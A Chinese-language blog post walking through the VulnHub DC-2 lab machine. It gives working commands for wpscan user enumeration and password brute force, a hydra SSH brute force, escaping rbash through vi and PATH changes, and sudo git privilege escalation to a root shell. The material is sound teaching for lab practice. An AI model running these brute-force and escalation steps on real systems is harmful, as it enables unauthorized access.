<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"unevensails.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="老规矩先arp扫存活主机nmap扫端口 可以看到http和ssh端口开放，先从80端口入手，结果发现访问的时候网站自动跳转dc-2,说明域名解析错误。解决方法是在hosts文件中添加对应的IP和域名 接着直接访问dc-2，找到flag1 发现关键词cewl  cewl是一个ruby应用，爬行指定url的指定深度。也可以跟一个外部链接，结果会返回一个单词列表，这个列表可以扔到John theripp">
<meta property="og:type" content="article">
<meta property="og:title" content="vulnhub--DC2">
<meta property="og:url" content="http://unevensails.github.io/2021/10/07/vulnhub--DC2/index.html">
<meta property="og:site_name" content="unevensails&#39;s blog">
<meta property="og:description" content="老规矩先arp扫存活主机nmap扫端口 可以看到http和ssh端口开放，先从80端口入手，结果发现访问的时候网站自动跳转dc-2,说明域名解析错误。解决方法是在hosts文件中添加对应的IP和域名 接着直接访问dc-2，找到flag1 发现关键词cewl  cewl是一个ruby应用，爬行指定url的指定深度。也可以跟一个外部链接，结果会返回一个单词列表，这个列表可以扔到John theripp">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://img-blog.csdnimg.cn/0851058cc68941a4ad35b49df82ab1ab.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2dc6c30061a34b3281915ee09e51862e.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYmFpeWV4aW5nOA==,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/f0e024e540994876b20fbaa1bb213a74.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/d684145214b643d1b365acdccab57fcb.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYmFpeWV4aW5nOA==,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/45ff8b81262e48ed86b48aacf3e86251.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYmFpeWV4aW5nOA==,size_18,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/8921e78809814e198141d057bc89d796.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYmFpeWV4aW5nOA==,size_18,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/70abd597076f4971b5cac60fcb319293.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/66239d7cf4904af08906969a3ff6ac0a.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/17e6df03d35e4f1e8ac2bb0b70f3cfb8.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYmFpeWV4aW5nOA==,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/996b8237c8b14230bc1a5903781f76ca.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/775c32c581c04e0595f4c9138583c4e9.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/acd121ad7a504193b472145f40ea124e.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/530cf97fc086455f993323b4398a297d.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2156ad33d1f446ff98c46b07186c66cd.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYmFpeWV4aW5nOA==,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/303dedefd837445c9803a207b7c84e30.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/1aabc0194621454fa2145b9855cf5cd6.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/39488eae2cfb4231b1761e99f7a51068.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYmFpeWV4aW5nOA==,size_18,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/694fbba293ae4d8991cb0e547a0d0af4.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYmFpeWV4aW5nOA==,size_16,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/462042aff9424438957c831aac94f7c9.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/402ba509eff3410781bc9acde6242ed8.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/73e590d60f1045fa93cf2e2991e445cf.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/fe16e0b2c4f94db797ae691d1a6245f6.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYmFpeWV4aW5nOA==,size_18,color_FFFFFF,t_70,g_se,x_16">
<meta property="article:published_time" content="2021-10-07T13:30:28.000Z">
<meta property="article:modified_time" content="2021-10-07T13:31:50.101Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/0851058cc68941a4ad35b49df82ab1ab.png">

<link rel="canonical" href="http://unevensails.github.io/2021/10/07/vulnhub--DC2/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>vulnhub--DC2 | unevensails's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">unevensails's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://unevensails.github.io/2021/10/07/vulnhub--DC2/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="unevensails's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          vulnhub--DC2
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2021-10-07 21:30:28 / Modified: 21:31:50" itemprop="dateCreated datePublished" datetime="2021-10-07T21:30:28+08:00">2021-10-07</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>老规矩先arp扫存活主机<br><img src="https://img-blog.csdnimg.cn/0851058cc68941a4ad35b49df82ab1ab.png" alt="在这里插入图片描述">nmap扫端口</p>
<p><img src="https://img-blog.csdnimg.cn/2dc6c30061a34b3281915ee09e51862e.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYmFpeWV4aW5nOA==,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>可以看到http和ssh端口开放，先从80端口入手，结果发现访问的时候网站自动跳转dc-2,说明域名解析错误。解决方法是在hosts文件中添加对应的IP和域名</p>
<p><img src="https://img-blog.csdnimg.cn/f0e024e540994876b20fbaa1bb213a74.png" alt="在这里插入图片描述">接着直接访问dc-2，找到flag1</p>
<p><img src="https://img-blog.csdnimg.cn/d684145214b643d1b365acdccab57fcb.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYmFpeWV4aW5nOA==,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>发现关键词cewl</p>
<blockquote>
<p>cewl是一个ruby应用，爬行指定url的指定深度。也可以跟一个外部链接，结果会返回一个单词列表，这个列表可以扔到John theripper工具里进行密码破解。</p>
</blockquote>
<blockquote>
<p>cewl -w passwd.txt <a target="_blank" rel="noopener" href="http://dc-2/">http://dc-2</a></p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/45ff8b81262e48ed86b48aacf3e86251.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYmFpeWV4aW5nOA==,size_18,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"></p>
<p>访问dc-2时可以知道网页cms为WordPress,直接通过wpscan探测用户</p>
<p><strong>wpscan</strong></p>
<blockquote>
<p>该扫描器可以实现获取Wordpress站点用户名，获取安装的所有插件、主题，以及存在漏洞的插件、主题，并提供漏洞信息。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码。</p>
</blockquote>
<p>常用参数</p>
<blockquote>
<p>–update  更新到最新版本<br>–url   | -u <target url>  要扫描的WordPress站点.<br>–force | -f   不检查网站运行的是不是WordPress<br>–enumerate | -e [option(s)]  枚举</p>
</blockquote>
<p>wpscan扫描</p>
<blockquote>
<p>1、扫描WordPress漏洞<br>wpscan –url <a target="_blank" rel="noopener" href="http://www.xxxxx.top/">http://www.xxxxx.top/</a><br>2、扫描wordpress用户<br>wpscan –url <a target="_blank" rel="noopener" href="http://www.xxxxx.top/">http://www.xxxxx.top/</a> –enumerate u<br>3、扫描主题<br>wpscan –url <a target="_blank" rel="noopener" href="http://www.xxxxx.top/">http://www.xxxxx.top/</a> –enumerate t<br>4、扫描插件漏洞<br>wpscan –url<a target="_blank" rel="noopener" href="http://www.xxxxx.top/">http://www.xxxxx.top/</a> –enumerate p<br>5、使用WPScan进行暴力破解在进行暴力破解攻击之前，我们需要创建对应的字典文件。输入下列命令：<br>wpscan –url <a target="_blank" rel="noopener" href="https://www.xxxxx.top/-e">https://www.xxxxx.top/-e</a> u –wordlist /root/桌面/password.txt</p>
</blockquote>
<p>扫描得到三个用户，写入user.txt中<br><img src="https://img-blog.csdnimg.cn/8921e78809814e198141d057bc89d796.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYmFpeWV4aW5nOA==,size_18,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/70abd597076f4971b5cac60fcb319293.png" alt="在这里插入图片描述"><br>接着用wpscan爆出用户密码</p>
<blockquote>
<p>wpscan –url dc-2 user.txt -P passwd.txt</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/66239d7cf4904af08906969a3ff6ac0a.png" alt="在这里插入图片描述"><br>访问WordPress默认登录界面 /wp-login.php,登录jerry的时候发现flag2</p>
<p><img src="https://img-blog.csdnimg.cn/17e6df03d35e4f1e8ac2bb0b70f3cfb8.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYmFpeWV4aW5nOA==,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>flag提示让我们换条路走，想到nmap扫描的时候还扫出了一个7744端口（ssh）,使用hydra爆破ssh</p>
<p>hydra使用方法</p>
<blockquote>
<p>-R 根据上一次进度继续破解<br>-S 使用SSL协议连接<br>-s 指定端口<br>-l 指定用户名<br>-L 指定用户名字典(文件)<br>-p 指定密码破解<br>-P 指定密码字典(文件)<br>-e 空密码探测和指定用户密码探测(ns)<br>-C 用户名可以用:分割(username:password)可以代替-l username -p password<br>-o 输出文件<br>-t 指定多线程数量，默认为16个线程<br>-vV 显示详细过程</p>
</blockquote>
<p>爆破得到tom的密码</p>
<blockquote>
<p>hydra -L user.txt -P passwd.txt ssh://192.168.111.133 -s 7744 -o hydra.ssh -vV</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/996b8237c8b14230bc1a5903781f76ca.png" alt="在这里插入图片描述">登录ssh</p>
<p><img src="https://img-blog.csdnimg.cn/775c32c581c04e0595f4c9138583c4e9.png" alt="在这里插入图片描述"><br>ls发现flag3，但是由于权限无法使用cat命令</p>
<p><img src="https://img-blog.csdnimg.cn/acd121ad7a504193b472145f40ea124e.png" alt="在这里插入图片描述"><br>这里有两种方法拿到flag3<br>尝试用ls命令发现ls没有被限制，查看usr子目录，可以看到vi没有被限制，用vi绕过rbash</p>
<p><img src="https://img-blog.csdnimg.cn/530cf97fc086455f993323b4398a297d.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/2156ad33d1f446ff98c46b07186c66cd.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYmFpeWV4aW5nOA==,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>另一种方法是先绕过rbash再添加环境变量</p>
<p><img src="https://img-blog.csdnimg.cn/303dedefd837445c9803a207b7c84e30.png" alt="在这里插入图片描述"><br>添加环境变量</p>
<blockquote>
<p>export PATH=$ PATH:/bin/<br>export PATH=$ PATH:/usr/bin</p>
</blockquote>
<p>成功绕过拿到flag3<br><img src="https://img-blog.csdnimg.cn/1aabc0194621454fa2145b9855cf5cd6.png" alt="在这里插入图片描述"></p>
<p>flag3提示我们从jerry入手，pwd查看tom路径，发现在home目录中，在home目录果然找到jerry,接着在jerry中找到flag4</p>
<p><img src="https://img-blog.csdnimg.cn/39488eae2cfb4231b1761e99f7a51068.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYmFpeWV4aW5nOA==,size_18,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>发现关键词git,猜测用git提权获得root权限<br>先查看具有root权限的suid文件<br><img src="https://img-blog.csdnimg.cn/694fbba293ae4d8991cb0e547a0d0af4.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYmFpeWV4aW5nOA==,size_16,color_FFFFFF,t_70,g_se,x_16" alt="请添加图片描述"><br>发现能用sudo,满足执行sudo -l 提示不需要密码可以使用git命令的前提<br><img src="https://img-blog.csdnimg.cn/462042aff9424438957c831aac94f7c9.png" alt="在这里插入图片描述">git提权</p>
<blockquote>
<p>前提：执行sudo -l 提示不需要密码可以使用提权方法<br> 1、sudo git help config<br> #在末行命令模式输入 !/bin/bash 或 !’sh’ #完成提权<br>2、sudo git -p –help  !/bin/bash<br>#输入!/bin/bash，即可打开一个用户为root的shell</p>
</blockquote>
<p>再调用</p>
<blockquote>
<p>!/bin/sh</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/402ba509eff3410781bc9acde6242ed8.png" alt="在这里插入图片描述">成功获得root权限<br><img src="https://img-blog.csdnimg.cn/73e590d60f1045fa93cf2e2991e445cf.png" alt="在这里插入图片描述"><br>在root目录中找到最后一个flag</p>
<p><img src="https://img-blog.csdnimg.cn/fe16e0b2c4f94db797ae691d1a6245f6.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAYmFpeWV4aW5nOA==,size_18,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/09/27/vulnhub--DC1/" rel="prev" title="vulnhub--DC1">
      <i class="fa fa-chevron-left"></i> vulnhub--DC1
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/10/15/vulnhub--DC3/" rel="next" title="vulnhub--DC3">
      vulnhub--DC3 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">14</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
